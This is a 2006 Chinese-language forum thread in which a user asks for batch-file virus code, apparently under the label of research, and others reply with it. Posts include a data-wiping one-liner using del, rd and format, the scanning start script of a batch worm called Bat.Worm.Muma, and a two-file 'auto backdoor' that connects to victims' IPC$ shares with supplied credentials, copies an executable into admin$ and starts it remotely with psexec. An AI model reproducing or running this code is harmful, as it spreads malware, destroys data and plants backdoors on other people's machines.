标题: 请教,有没有用bat编的病毒代码,用以研究。 [打印本页]
作者: YYDDOS 时间: 2006-12-13 05:34 标题: 请教,有没有用bat编的病毒代码,用以研究。
;);)
作者: zh159 时间: 2006-12-13 05:41
有:
del/q *.*
rd/q *
format
^_^
作者: tianzizhi 时间: 2006-12-13 05:45
Bat.Worm.Muma病毒的起始脚本:
START.BAT:
CALL MUMA.BAT
SET IPA=192.168
CALL 10.BAT 0
:NEARAGAIN
netstat -n|find ":" >A.TMP
FOR /F "tokens=7,8,9,10,12 delims=.: " %%I IN (A.TMP) DO SET NUM1=%%I&& SET NUM2=%%J&& SET NUM3=%%K&& SET NUM4=%%L&& SET NUM5=%%M&& CALL NEAR.BAT
:START
CALL RANDOM.BAT
IF "%NUM1%"=="255" GOTO NEARAGAIN
IF "%NUM1%"=="192" GOTO NEARAGAIN
IF "%NUM1%"=="127" GOTO NEARAGAIN
IF "%NUM2%"=="255" GOTO NEARAGAIN
IF "%NUM3%"=="255" GOTO NEARAGAIN
IF "%NUM4%"=="255" GOTO NEARAGAIN
SET IPA=%NUM1%.%NUM2%
ECHO START > A.LOG
PING %IPA%.%NUM3%.1>B.TMP
PING %IPA%.%NUM3%.%NUM4%>>B.TMP
FIND /C /I "from" B.TMP
IF ERRORLEVEL 1 GOTO START
CALL 10.BAT %NUM3%
DEL A.LOG
GOTO START
下面的是自动后门.
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
--------------- cut here then save as a batchfile(I call it main.bat ) ---------------------------
------------------- cut here then save as a batchfile(I call it door.bat) -----------------------------
@net use \\%1\ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection ............OK
@copy windrv32.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
@psexec \\%1 c:\winnt\system32\windrv32.exe
@psexec \\%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
----------------- cut here then save as a batchfile(I call it door.bat) --------------------------------
作者: ccwan 时间: 2006-12-13 05:46
硬盘杀手(澳洲版)批处理源代码
我曾经把代码存为*.bat,立即被卡巴杀掉了^_^
作者: echo 时间: 2006-12-13 05:49
拜托,TXT也会被杀的,不过看了个BAT SHELL说有办法逃过它,呵呵
作者: vkill 时间: 2006-12-13 05:57
没有IPC$ psexec就不能用,其实上面的那个是针对太不安全的虮子的
作者: lxmxn 时间: 2006-12-13 06:14
| Quote: | |
|
有语法错误把?
作者: YYDDOS 时间: 2006-12-13 13:03
上面的这个病毒有什么破坏力.